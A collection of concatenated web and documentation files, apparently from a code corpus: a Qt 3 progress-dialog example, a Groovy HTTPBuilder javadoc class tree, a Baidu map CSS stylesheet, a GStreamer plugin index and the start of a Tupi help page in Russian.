<a name="x82"></a> connect(pb, SIGNAL(<a href="qprogressdialog.html#cancelled">cancelled</a>()), this, SLOT(stopDrawing()));
enableDrawingItems(FALSE);
startTimer(0);
got_stop = FALSE;
} else {
<a href="qprogressdialog.html">QProgressDialog</a>* lpb = newProgressDialog(
"Drawing rectangles.\nUsing loop.", n, TRUE);
lpb-><a href="qwidget.html#setCaption">setCaption</a>("Please Wait");
<a href="qpainter.html">QPainter</a> p(this);
for (int i=0; i<n; i++) {
lpb-><a href="qprogressdialog.html#setProgress">setProgress</a>(i);
<a name="x87"></a> if ( lpb-><a href="qprogressdialog.html#wasCancelled">wasCancelled</a>() )
break;
<a href="qcolor.html">QColor</a> c(rand()%255, rand()%255, rand()%255);
int x = rand()%(width()-8);
int y = rand()%(height()-8);
int w = rand()%(width()-x);
int h = rand()%(height()-y);
p.<a href="qpainter.html#fillRect">fillRect</a>(x,y,w,h,c);
}
p.<a href="qpainter.html#fillRect">fillRect</a>(0, 0, width(), height(), backgroundColor());
delete lpb;
}
}
<a href="qmenubar.html">QMenuBar</a>* menubar;
<a href="qprogressdialog.html">QProgressDialog</a>* pb;
<a href="qpopupmenu.html">QPopupMenu</a>* options;
int td_id, ld_id;
int dl_id, cl_id;
int md_id;
int rects;
bool timer_driven;
bool default_label;
bool got_stop;
};
int main( int argc, char **argv )
{
<a href="qapplication.html">QApplication</a> a( argc, argv );
int wincount = argc > 1 ? atoi(argv[1]) : 1;
for ( int i=0; i<wincount; i++ ) {
CPUWaster* cpuw = new CPUWaster;
if ( i == 0 ) a.<a href="qapplication.html#setMainWidget">setMainWidget</a>(cpuw);
cpuw-><a href="qwidget.html#show">show</a>();
}
return a.<a href="qapplication.html#exec">exec</a>();
}
#include "progress.moc"
</pre>
<p>See also <a href="examples.html">Examples</a>.
<!-- eof -->
<p><address><hr><div align=center>
<table width=100% cellspacing=0 border=0><tr>
<td>Copyright © 2007
<a href="troll.html">Trolltech</a><td align=center><a href="trademarks.html">Trademarks</a>
<td align=right><div align=right>Qt 3.3.8</div>
</table></div></address></body>
</html>
|
videos-smartphone/www/http-builder-0.6/site/apidocs/groovyx/net/http/package-tree.html | nbakken81/AIDE | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--NewPage-->
<HTML>
<HEAD>
<!-- Generated by javadoc (build 1.6.0_35) on Tue Oct 16 03:10:31 PDT 2012 -->
<META http-equiv="Content-Type" content="text/html; charset=UTF-8">
<TITLE>
groovyx.net.http Class Hierarchy (HTTP client framework for Groovy 0.6 API)
</TITLE>
<META NAME="date" CONTENT="2012-10-16">
<LINK REL ="stylesheet" TYPE="text/css" HREF="../../../stylesheet.css" TITLE="Style">
<SCRIPT type="text/javascript">
function windowTitle()
{
if (location.href.indexOf('is-external=true') == -1) {
parent.document.title="groovyx.net.http Class Hierarchy (HTTP client framework for Groovy 0.6 API)";
}
}
</SCRIPT>
<NOSCRIPT>
</NOSCRIPT>
</HEAD>
<BODY BGCOLOR="white" onload="windowTitle();">
<HR>
<!-- ========= START OF TOP NAVBAR ======= -->
<A NAME="navbar_top"><!-- --></A>
<A HREF="#skip-navbar_top" title="Skip navigation links"></A>
<TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY="">
<TR>
<TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1">
<A NAME="navbar_top_firstrow"><!-- --></A>
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY="">
<TR ALIGN="center" VALIGN="top">
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <FONT CLASS="NavBarFont1">Class</FONT> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <FONT CLASS="NavBarFont1">Use</FONT> </TD>
<TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> <FONT CLASS="NavBarFont1Rev"><B>Tree</B></FONT> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A> </TD>
</TR>
</TABLE>
</TD>
<TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM>
</EM>
</TD>
</TR>
<TR>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
PREV
<A HREF="../../../groovyx/net/http/thirdparty/package-tree.html"><B>NEXT</B></A></FONT></TD>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../../../index.html?groovyx/net/http/package-tree.html" target="_top"><B>FRAMES</B></A>
<A HREF="package-tree.html" target="_top"><B>NO FRAMES</B></A>
<SCRIPT type="text/javascript">
<!--
if(window==top) {
document.writeln('<A HREF="../../../allclasses-noframe.html"><B>All Classes</B></A>');
}
//-->
</SCRIPT>
<NOSCRIPT>
<A HREF="../../../allclasses-noframe.html"><B>All Classes</B></A>
</NOSCRIPT>
</FONT></TD>
</TR>
</TABLE>
<A NAME="skip-navbar_top"></A>
<!-- ========= END OF TOP NAVBAR ========= -->
<HR>
<CENTER>
<H2>
Hierarchy For Package groovyx.net.http
</H2>
</CENTER>
<DL>
<DT><B>Package Hierarchies:</B><DD><A HREF="../../../overview-tree.html">All Packages</A></DL>
<HR>
<H2>
Class Hierarchy
</H2>
<UL>
<LI TYPE="circle">java.lang.<A HREF="http://docs.oracle.com/javase/1.5.0/docs/api/java/lang/Object.html?is-external=true" title="class or interface in java.lang"><B>Object</B></A><UL>
<LI TYPE="circle">groovyx.net.http.<A HREF="../../../groovyx/net/http/AuthConfig.html" title="class in groovyx.net.http"><B>AuthConfig</B></A><LI TYPE="circle">groovyx.net.http.<A HREF="../../../groovyx/net/http/ContentEncoding.html" title="class in groovyx.net.http"><B>ContentEncoding</B></A><UL>
<LI TYPE="circle">groovyx.net.http.<A HREF="../../../groovyx/net/http/DeflateEncoding.html" title="class in groovyx.net.http"><B>DeflateEncoding</B></A><LI TYPE="circle">groovyx.net.http.<A HREF="../../../groovyx/net/http/GZIPEncoding.html" title="class in groovyx.net.http"><B>GZIPEncoding</B></A></UL>
<LI TYPE="circle">groovyx.net.http.<A HREF="../../../groovyx/net/http/ContentEncoding.RequestInterceptor.html" title="class in groovyx.net.http"><B>ContentEncoding.RequestInterceptor</B></A> (implements org.apache.http.HttpRequestInterceptor)
<LI TYPE="circle">groovyx.net.http.<A HREF="../../../groovyx/net/http/ContentEncoding.ResponseInterceptor.html" title="class in groovyx.net.http"><B>ContentEncoding.ResponseInterceptor</B></A> (implements org.apache.http.HttpResponseInterceptor)
<LI TYPE="circle">groovyx.net.http.<A HREF="../../../groovyx/net/http/ContentEncodingRegistry.html" title="class in groovyx.net.http"><B>ContentEncodingRegistry</B></A><LI TYPE="circle">groovyx.net.http.<A HREF="../../../groovyx/net/http/EncoderRegistry.html" title="class in groovyx.net.http"><B>EncoderRegistry</B></A><LI TYPE="circle">groovyx.net.http.<A HREF="../../../groovyx/net/http/HTTPBuilder.html" title="class in groovyx.net.http"><B>HTTPBuilder</B></A><UL>
<LI TYPE="circle">groovyx.net.http.<A HREF="../../../groovyx/net/http/AsyncHTTPBuilder.html" title="class in groovyx.net.http"><B>AsyncHTTPBuilder</B></A><LI TYPE="circle">groovyx.net.http.<A HREF="../../../groovyx/net/http/RESTClient.html" title="class in groovyx.net.http"><B>RESTClient</B></A></UL>
<LI TYPE="circle">groovyx.net.http.<A HREF="../../../groovyx/net/http/HTTPBuilder.RequestConfigDelegate.html" title="class in groovyx.net.http"><B>HTTPBuilder.RequestConfigDelegate</B></A><LI TYPE="circle">groovyx.net.http.<A HREF="../../../groovyx/net/http/HttpContextDecorator.html" title="class in groovyx.net.http"><B>HttpContextDecorator</B></A> (implements org.apache.http.protocol.HttpContext)
<LI TYPE="circle">org.apache.http.entity.HttpEntityWrapper (implements org.apache.http.HttpEntity)
<UL>
<LI TYPE="circle">groovyx.net.http.<A HREF="../../../groovyx/net/http/DeflateEncoding.InflaterEntity.html" title="class in groovyx.net.http"><B>DeflateEncoding.InflaterEntity</B></A><LI TYPE="circle">groovyx.net.http.<A HREF="../../../groovyx/net/http/GZIPEncoding.GZIPDecompressingEntity.html" title="class in groovyx.net.http"><B>GZIPEncoding.GZIPDecompressingEntity</B></A></UL>
<LI TYPE="circle">groovyx.net.http.<A HREF="../../../groovyx/net/http/HttpResponseDecorator.html" title="class in groovyx.net.http"><B>HttpResponseDecorator</B></A> (implements org.apache.http.HttpResponse)
<LI TYPE="circle">groovyx.net.http.<A HREF="../../../groovyx/net/http/HttpResponseDecorator.HeadersDecorator.html" title="class in groovyx.net.http"><B>HttpResponseDecorator.HeadersDecorator</B></A> (implements java.lang.<A HREF="http://docs.oracle.com/javase/1.5.0/docs/api/java/lang/Iterable.html?is-external=true" title="class or interface in java.lang">Iterable</A><T>)
<LI TYPE="circle">groovyx.net.http.<A HREF="../../../groovyx/net/http/HttpURLClient.html" title="class in groovyx.net.http"><B>HttpURLClient</B></A><LI TYPE="circle">groovyx.net.http.<A HREF="../../../groovyx/net/http/ParserRegistry.html" title="class in groovyx.net.http"><B>ParserRegistry</B></A><LI TYPE="circle">java.lang.<A HREF="http://docs.oracle.com/javase/1.5.0/docs/api/java/lang/Throwable.html?is-external=true" title="class or interface in java.lang"><B>Throwable</B></A> (implements java.io.<A HREF="http://docs.oracle.com/javase/1.5.0/docs/api/java/io/Serializable.html?is-external=true" title="class or interface in java.io">Serializable</A>)
<UL>
<LI TYPE="circle">java.lang.<A HREF="http://docs.oracle.com/javase/1.5.0/docs/api/java/lang/Exception.html?is-external=true" title="class or interface in java.lang"><B>Exception</B></A><UL>
<LI TYPE="circle">java.io.<A HREF="http://docs.oracle.com/javase/1.5.0/docs/api/java/io/IOException.html?is-external=true" title="class or interface in java.io"><B>IOException</B></A><UL>
<LI TYPE="circle">org.apache.http.client.ClientProtocolException<UL>
<LI TYPE="circle">org.apache.http.client.HttpResponseException<UL>
<LI TYPE="circle">groovyx.net.http.<A HREF="../../../groovyx/net/http/HttpResponseException.html" title="class in groovyx.net.http"><B>HttpResponseException</B></A><UL>
<LI TYPE="circle">groovyx.net.http.<A HREF="../../../groovyx/net/http/ResponseParseException.html" title="class in groovyx.net.http"><B>ResponseParseException</B></A></UL>
</UL>
</UL>
</UL>
</UL>
</UL>
<LI TYPE="circle">groovyx.net.http.<A HREF="../../../groovyx/net/http/URIBuilder.html" title="class in groovyx.net.http"><B>URIBuilder</B></A> (implements java.lang.<A HREF="http://docs.oracle.com/javase/1.5.0/docs/api/java/lang/Cloneable.html?is-external=true" title="class or interface in java.lang">Cloneable</A>)
</UL>
</UL>
<H2>
Enum Hierarchy
</H2>
<UL>
<LI TYPE="circle">java.lang.<A HREF="http://docs.oracle.com/javase/1.5.0/docs/api/java/lang/Object.html?is-external=true" title="class or interface in java.lang"><B>Object</B></A><UL>
<LI TYPE="circle">java.lang.<A HREF="http://docs.oracle.com/javase/1.5.0/docs/api/java/lang/Enum.html?is-external=true" title="class or interface in java.lang"><B>Enum</B></A><E> (implements java.lang.<A HREF="http://docs.oracle.com/javase/1.5.0/docs/api/java/lang/Comparable.html?is-external=true" title="class or interface in java.lang">Comparable</A><T>, java.io.<A HREF="http://docs.oracle.com/javase/1.5.0/docs/api/java/io/Serializable.html?is-external=true" title="class or interface in java.io">Serializable</A>)
<UL>
<LI TYPE="circle">groovyx.net.http.<A HREF="../../../groovyx/net/http/Status.html" title="enum in groovyx.net.http"><B>Status</B></A><LI TYPE="circle">groovyx.net.http.<A HREF="../../../groovyx/net/http/Method.html" title="enum in groovyx.net.http"><B>Method</B></A><LI TYPE="circle">groovyx.net.http.<A HREF="../../../groovyx/net/http/ContentType.html" title="enum in groovyx.net.http"><B>ContentType</B></A><LI TYPE="circle">groovyx.net.http.<A HREF="../../../groovyx/net/http/ContentEncoding.Type.html" title="enum in groovyx.net.http"><B>ContentEncoding.Type</B></A></UL>
</UL>
</UL>
<HR>
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<A NAME="navbar_bottom"><!-- --></A>
<A HREF="#skip-navbar_bottom" title="Skip navigation links"></A>
<TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY="">
<TR>
<TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1">
<A NAME="navbar_bottom_firstrow"><!-- --></A>
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY="">
<TR ALIGN="center" VALIGN="top">
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <FONT CLASS="NavBarFont1">Class</FONT> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <FONT CLASS="NavBarFont1">Use</FONT> </TD>
<TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> <FONT CLASS="NavBarFont1Rev"><B>Tree</B></FONT> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A> </TD>
</TR>
</TABLE>
</TD>
<TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM>
</EM>
</TD>
</TR>
<TR>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
PREV
<A HREF="../../../groovyx/net/http/thirdparty/package-tree.html"><B>NEXT</B></A></FONT></TD>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../../../index.html?groovyx/net/http/package-tree.html" target="_top"><B>FRAMES</B></A>
<A HREF="package-tree.html" target="_top"><B>NO FRAMES</B></A>
<SCRIPT type="text/javascript">
<!--
if(window==top) {
document.writeln('<A HREF="../../../allclasses-noframe.html"><B>All Classes</B></A>');
}
//-->
</SCRIPT>
<NOSCRIPT>
<A HREF="../../../allclasses-noframe.html"><B>All Classes</B></A>
</NOSCRIPT>
</FONT></TD>
</TR>
</TABLE>
<A NAME="skip-navbar_bottom"></A>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
<HR>
Copyright © 2008-2012. All Rights Reserved.
</BODY>
</HTML>
|
Site/Resources/css/baidu.map.source.css | Delta-SH/PecsSystem | /*Info Window*/
.infoWndBox {
display: none;
}
.infoWnd_title {
color: #4D4D4D;
font-size: 14px;
font-weight: bold;
overflow: hidden;
width: 235px;
}
.infoWnd_title a {
color: #3D6DCC;
text-decoration: none;
font-size: 12px;
font-weight: normal;
}
.infoWnd_title a:hover {
text-decoration: underline;
}
.infoWnd_ctrl {
position:absolute;
right:35px;
top:10px;
}
.infoWnd_ctrl span{
cursor: pointer;
float: left;
height: 12px;
width: 12px;
margin-left:7px;
}
.infoWnd_ctrl .delete{
background: url("../images/Baidu/SearchInfoWindow/iw_bg.png") no-repeat scroll -48px -138px transparent;
}
.infoWnd_ctrl .edit{
background: url("../images/Baidu/SearchInfoWindow/iw_bg.png") no-repeat scroll -63px -138px transparent;
}
.infoWnd_content .waitting{
height:20px;
line-height:18px;
padding-left:20px;
background: url("../images/Shared/loading.gif") no-repeat;
}
/*Edit Window*/
.editWndBox {
display: none;
}
.editWnd_title {
color: #4D4D4D;
font-size: 14px;
font-weight: bold;
overflow: hidden;
width: 270px;
}
.editWnd_content {
margin:2px 34px 2px 15px;
}
.editWnd_content .item {
color: #4D4D4D;
overflow: hidden;
clear: both;
}
.editWnd_content .item input {
color:#8C8C8C;
border:#b5b5b5 solid 1px;
}
.editWnd_content .bottom {
text-align:right;
}
/*Content Window*/
.contentWndBox {
}
.contentWndBox .content {
width: 100%;
color: #4D4D4D;
margin-bottom:5px;
}
.contentWndBox .content td {
padding-bottom:3px;
}
.contentWndBox .content td.title {
width: 40px;
}
.contentWndBox .alarm {
width: 100%;
color: #4D4D4D;
}
.contentWndBox .alarm td {
padding-bottom:5px;
}
.contentWndBox .alarm td.title {
width: 65px;
}
.contentWndBox .alarm td a {
color: #3D6DCC;
text-decoration: none;
}
.contentWndBox .alarm td a:hover {
text-decoration: underline;
}
/*Nav Page*/
.cursor-alarm-cnt { background:transparent url(../images/Baidu/Map/labCnt.gif) no-repeat 5px 3px; padding:0 0 0 23px; float:left;}
.cursor-alarm-1 { background:transparent url(../images/Baidu/Map/labAL1.gif) no-repeat 5px 3px; padding:0 0 0 23px; float:left;}
.cursor-alarm-2 { background:transparent url(../images/Baidu/Map/labAL2.gif) no-repeat 5px 3px; padding:0 0 0 23px; float:left;}
.cursor-alarm-3 { background:transparent url(../images/Baidu/Map/labAL3.gif) no-repeat 5px 3px; padding:0 0 0 23px; float:left;}
.cursor-alarm-4 { background:transparent url(../images/Baidu/Map/labAL4.gif) no-repeat 5px 3px; padding:0 0 0 23px; float:left;}
/*SearchInfo Window*/
.BMapLib_SearchInfoWindow {
font: 12px arial,宋体,sans-serif;
position: absolute;
border: 1px solid rgb(153, 153, 153);
background-color: #fff;
cursor:default;
}
.BMapLib_SearchInfoWindow form, ul, li {
margin: 0;
padding: 0;
}
.BMapLib_SearchInfoWindow img {
border: 0;
}
.BMapLib_SearchInfoWindow ul {
list-style: none;
}
.BMapLib_SearchInfoWindow .BMapLib_bubble_top {
border-bottom: 1px solid #ccc;
height: 31px;
}
.BMapLib_SearchInfoWindow .BMapLib_bubble_title {
line-height: 30px;
background-color: rgb(249, 249, 249);
overflow: hidden;
height: 30px;
padding: 0px 5px;
font-size: 12px;
}
.BMapLib_SearchInfoWindow .BMapLib_bubble_close {
float: right;
position: absolute;
top: 0px;
right: 0px;
height: 30px;
width: 32px;
cursor: pointer;
background-color: #f9f9f9;
}
.BMapLib_SearchInfoWindow .BMapLib_bubble_close span {
background: url(../images/Baidu/SearchInfoWindow/iw_close.gif);
position: absolute;
top: 9px;
right: 12px;
width: 10px;
height: 10px;
-moz-user-select: none;
overflow:hidden;
cursor: pointer;
line-height: 9999px;
z-index: 10000;
}
.BMapLib_SearchInfoWindow .BMapLib_bubble_center {
z-index: 3;
}
.BMapLib_SearchInfoWindow .BMapLib_bubble_content {
padding:3px 5px;
overflow-x: auto;
overflow-y: hidden;
}
.BMapLib_SearchInfoWindow .BMapLib_bubble_bottom {
display: block;
z-index: 2;
}
.BMapLib_SearchInfoWindow .BMapLib_trans {
z-index: 5;
position: absolute;
bottom: -31px;
*bottom: -32px;
}
.BMapLib_SearchInfoWindow .BMapLib_nav {
width: 100%;
height: 75px;
overflow: visibile;
position: relative;
}
.BMapLib_SearchInfoWindow .BMapLib_nav input {
vertical-align: middle;
}
.BMapLib_SearchInfoWindow .iw_bt, .iw_bt_down, .iw_bt_over {
width: 48px;
height: 26px;
line-height: 18px;
cursor: pointer;
border: 0;
padding: 0;
background: url('../images/Baidu/SearchInfoWindow/iw_bg.png') no-repeat 0 -87px;
vertical-align:middle;
}
.BMapLib_SearchInfoWindow .iw_bt_over {
background-position:-52px -87px;
}
.BMapLib_SearchInfoWindow .iw_bt_down {
background-position:-104px -87px;
font-weight:700;
}
.BMapLib_search_text{width:100%;height:20px;line-height:20px;border:1px solid #A5ACB2}
.BMapLib_trans_text{width:100%;height:20px;line-height:20px;border:1px solid #A5ACB2;}
.BMapLib_nav_tab{height:30px;width:100%;background:url('../images/Baidu/SearchInfoWindow/iw_bg.png') repeat-x 0 0}
.BMapLib_nav_tab li{position:relative;float:left;width:114px;height:25px;padding-top:5px;text-align:center;border-left:1px solid #dadada;cursor:pointer;overflow:hidden;width:33%;}
.BMapLib_nav_tab .BMapLib_icon{display:inline-block;position:relative;width:10px;height:15px;top:3px;margin-right:7px;background:url('../images/Baidu/SearchInfoWindow/iw_bg.png') no-repeat 0 -136px;}
.BMapLib_nav_tab .BMapLib_icon_tohere{background-position:-15px -136px}
.BMapLib_nav_tab .BMapLib_icon_nbs{width:14px;height:14px;background-position:-30px -136px}
.BMapLib_nav_tab li.BMapLib_first{border-left:0;}
.BMapLib_nav_tab li:hover{text-decoration:none;}
.BMapLib_nav_tab li.BMapLib_current{color:#4d4d4d;cursor:default;background:url('../images/Baidu/SearchInfoWindow/iw_bg.png') repeat-x 0 -44px}
.BMapLib_nav_tab_content li{padding:10px 0 0 0;position:relative;height:22px;font-family:"宋体"}
|
docs/plugins/html/ch02.html | mrchapp/gst-plugins-base | <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>gst-plugins-base Plugins</title>
<meta name="generator" content="DocBook XSL Stylesheets V1.75.2">
<link rel="home" href="index.html" title="GStreamer Base Plugins 0.10 Plugins Reference Manual">
<link rel="up" href="index.html" title="GStreamer Base Plugins 0.10 Plugins Reference Manual">
<link rel="prev" href="gst-plugins-base-plugins-xvimagesink.html" title="xvimagesink">
<link rel="next" href="gst-plugins-base-plugins-plugin-adder.html" title="adder">
<meta name="generator" content="GTK-Doc V1.15 (XML mode)">
<link rel="stylesheet" href="style.css" type="text/css">
</head>
<body bgcolor="white" text="black" link="#0000FF" vlink="#840084" alink="#0000FF">
<table class="navigation" id="top" width="100%" summary="Navigation header" cellpadding="2" cellspacing="2"><tr valign="middle">
<td><a accesskey="p" href="gst-plugins-base-plugins-xvimagesink.html"><img src="left.png" width="24" height="24" border="0" alt="Prev"></a></td>
<td> </td>
<td><a accesskey="h" href="index.html"><img src="home.png" width="24" height="24" border="0" alt="Home"></a></td>
<th width="100%" align="center">GStreamer Base Plugins 0.10 Plugins Reference Manual</th>
<td><a accesskey="n" href="gst-plugins-base-plugins-plugin-adder.html"><img src="right.png" width="24" height="24" border="0" alt="Next"></a></td>
</tr></table>
<div class="chapter" title="gst-plugins-base Plugins">
<div class="titlepage"><div><div><h2 class="title">
<a name="id493257"></a>gst-plugins-base Plugins</h2></div></div></div>
<div class="toc"><dl>
<dt>
<span class="refentrytitle"><a href="gst-plugins-base-plugins-plugin-adder.html">adder</a></span><span class="refpurpose"> — <a name="plugin-adder"></a>Adds multiple streams</span>
</dt>
<dt>
<span class="refentrytitle"><a href="gst-plugins-base-plugins-plugin-alsa.html">alsa</a></span><span class="refpurpose"> — <a name="plugin-alsa"></a>ALSA plugin library</span>
</dt>
<dt>
<span class="refentrytitle"><a href="gst-plugins-base-plugins-plugin-app.html">app</a></span><span class="refpurpose"> — <a name="plugin-app"></a>Elements used to communicate with applications</span>
</dt>
<dt>
<span class="refentrytitle"><a href="gst-plugins-base-plugins-plugin-audioconvert.html">audioconvert</a></span><span class="refpurpose"> — <a name="plugin-audioconvert"></a>Convert audio to different formats</span>
</dt>
<dt>
<span class="refentrytitle"><a href="gst-plugins-base-plugins-plugin-audiorate.html">audiorate</a></span><span class="refpurpose"> — <a name="plugin-audiorate"></a>Adjusts audio frames</span>
</dt>
<dt>
<span class="refentrytitle"><a href="gst-plugins-base-plugins-plugin-audioresample.html">audioresample</a></span><span class="refpurpose"> — <a name="plugin-audioresample"></a>Resamples audio</span>
</dt>
<dt>
<span class="refentrytitle"><a href="gst-plugins-base-plugins-plugin-audiotestsrc.html">audiotestsrc</a></span><span class="refpurpose"> — <a name="plugin-audiotestsrc"></a>Creates audio test signals of given frequency and volume</span>
</dt>
<dt>
<span class="refentrytitle"><a href="gst-plugins-base-plugins-plugin-cdparanoia.html">cdparanoia</a></span><span class="refpurpose"> — <a name="plugin-cdparanoia"></a>Read audio from CD in paranoid mode</span>
</dt>
<dt>
<span class="refentrytitle"><a href="gst-plugins-base-plugins-plugin-decodebin.html">decodebin</a></span><span class="refpurpose"> — <a name="plugin-decodebin"></a>decoder bin</span>
</dt>
<dt>
<span class="refentrytitle"><a href="gst-plugins-base-plugins-plugin-encoding.html">encoding</a></span><span class="refpurpose"> — <a name="plugin-encoding"></a>various encoding-related elements</span>
</dt>
<dt>
<span class="refentrytitle"><a href="gst-plugins-base-plugins-plugin-ffmpegcolorspace.html">ffmpegcolorspace</a></span><span class="refpurpose"> — <a name="plugin-ffmpegcolorspace"></a>colorspace conversion copied from FFMpeg 0.4.9-pre1</span>
</dt>
<dt>
<span class="refentrytitle"><a href="gst-plugins-base-plugins-plugin-gdp.html">gdp</a></span><span class="refpurpose"> — <a name="plugin-gdp"></a>Payload/depayload GDP packets</span>
</dt>
<dt>
<span class="refentrytitle"><a href="gst-plugins-base-plugins-plugin-gio.html">gio</a></span><span class="refpurpose"> — <a name="plugin-gio"></a>GIO elements</span>
</dt>
<dt>
<span class="refentrytitle"><a href="gst-plugins-base-plugins-plugin-gnomevfs.html">gnomevfs</a></span><span class="refpurpose"> — <a name="plugin-gnomevfs"></a>elements to read from and write to Gnome-VFS uri's</span>
</dt>
<dt>
<span class="refentrytitle"><a href="gst-plugins-base-plugins-plugin-libvisual.html">libvisual</a></span><span class="refpurpose"> — <a name="plugin-libvisual"></a>libvisual visualization plugins</span>
</dt>
<dt>
<span class="refentrytitle"><a href="gst-plugins-base-plugins-plugin-ogg.html">ogg</a></span><span class="refpurpose"> — <a name="plugin-ogg"></a>ogg stream manipulation (info about ogg: http://xiph.org)</span>
</dt>
<dt>
<span class="refentrytitle"><a href="gst-plugins-base-plugins-plugin-pango.html">pango</a></span><span class="refpurpose"> — <a name="plugin-pango"></a>Pango-based text rendering and overlay</span>
</dt>
<dt>
<span class="refentrytitle"><a href="gst-plugins-base-plugins-plugin-playback.html">playback</a></span><span class="refpurpose"> — <a name="plugin-playback"></a>various playback elements</span>
</dt>
<dt>
<span class="refentrytitle"><a href="gst-plugins-base-plugins-plugin-subparse.html">subparse</a></span><span class="refpurpose"> — <a name="plugin-subparse"></a>Subtitle parsing</span>
</dt>
<dt>
<span class="refentrytitle"><a href="gst-plugins-base-plugins-plugin-tcp.html">tcp</a></span><span class="refpurpose"> — <a name="plugin-tcp"></a>transfer data over the network via TCP</span>
</dt>
<dt>
<span class="refentrytitle"><a href="gst-plugins-base-plugins-plugin-theora.html">theora</a></span><span class="refpurpose"> — <a name="plugin-theora"></a>Theora plugin library</span>
</dt>
<dt>
<span class="refentrytitle"><a href="gst-plugins-base-plugins-plugin-typefindfunctions.html">typefindfunctions</a></span><span class="refpurpose"> — <a name="plugin-typefindfunctions"></a>default typefind functions</span>
</dt>
<dt>
<span class="refentrytitle"><a href="gst-plugins-base-plugins-plugin-uridecodebin.html">uridecodebin</a></span><span class="refpurpose"> — <a name="plugin-uridecodebin"></a>URI Decoder bin</span>
</dt>
<dt>
<span class="refentrytitle"><a href="gst-plugins-base-plugins-plugin-video4linux.html">video4linux</a></span><span class="refpurpose"> — <a name="plugin-video4linux"></a>elements for Video 4 Linux</span>
</dt>
<dt>
<span class="refentrytitle"><a href="gst-plugins-base-plugins-plugin-videorate.html">videorate</a></span><span class="refpurpose"> — <a name="plugin-videorate"></a>Adjusts video frames</span>
</dt>
<dt>
<span class="refentrytitle"><a href="gst-plugins-base-plugins-plugin-videoscale.html">videoscale</a></span><span class="refpurpose"> — <a name="plugin-videoscale"></a>Resizes video</span>
</dt>
<dt>
<span class="refentrytitle"><a href="gst-plugins-base-plugins-plugin-videotestsrc.html">videotestsrc</a></span><span class="refpurpose"> — <a name="plugin-videotestsrc"></a>Creates a test video stream</span>
</dt>
<dt>
<span class="refentrytitle"><a href="gst-plugins-base-plugins-plugin-volume.html">volume</a></span><span class="refpurpose"> — <a name="plugin-volume"></a>plugin for controlling audio volume</span>
</dt>
<dt>
<span class="refentrytitle"><a href="gst-plugins-base-plugins-plugin-vorbis.html">vorbis</a></span><span class="refpurpose"> — <a name="plugin-vorbis"></a>Vorbis plugin library</span>
</dt>
<dt>
<span class="refentrytitle"><a href="gst-plugins-base-plugins-plugin-ximagesink.html">ximagesink</a></span><span class="refpurpose"> — <a name="plugin-ximagesink"></a>X11 video output element based on standard Xlib calls</span>
</dt>
<dt>
<span class="refentrytitle"><a href="gst-plugins-base-plugins-plugin-xvimagesink.html">xvimagesink</a></span><span class="refpurpose"> — <a name="plugin-xvimagesink"></a>XFree86 video output plugin using Xv extension</span>
</dt>
</dl></div>
</div>
<div class="footer">
<hr>
Generated by GTK-Doc V1.15</div>
</body>
</html> |
src/components/help/help/ru/links.html | KDE/tupi | <html>
<head>
<link rel="stylesheet" type="text/css" href="tupi.css" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
</head>
<body class="tupi_background4">
<center>
<b>[ Under Translation ]</b>
</center>
<p class="title">Интересные ссылки</p>
<p class="paragraph">
